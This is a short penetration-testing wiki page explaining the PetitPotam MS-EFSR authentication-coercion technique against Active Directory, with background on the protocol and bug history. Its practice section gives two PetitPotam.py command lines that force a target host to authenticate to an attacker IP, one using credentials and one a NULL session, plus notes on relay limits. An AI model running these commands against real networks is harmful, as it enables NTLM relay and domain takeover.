MS-EFSR abuse (PetitPotam)

Theory

MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \pipe\efsrpc, \pipe\lsarpc, \pipe\samr, \pipe\lsass and \pipe\netlogon SMB named pipes.
In 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.
While the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Gilles LIONEL used that bug to remotely coerce domain-joined machine's authentication.
At the time of writing (08/11/2021), this bug has not been fully addressed by Microsoft.

Practice

An authentication can be forced with the original author's proof-of-concepts dubbed "PetitPotam" (available in C and Python) by using a valid AD account's credentials.
1
Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
Copied!
Nota bene: the coerced NTLM authentication will be made through SMB. This is important because it restricts the possibilites of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMBv2 to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug (if allowed by the target). This has only been verified to be working on on Windows Server 2016 and Windows Server 2019 Domain Controllers.
1
Petitpotam.py $ATTACKER_IP $TARGET_IP
Copied!

Resources

Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation
Exploit Database
GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.
GitHub
Last modified 22d ago
Copy link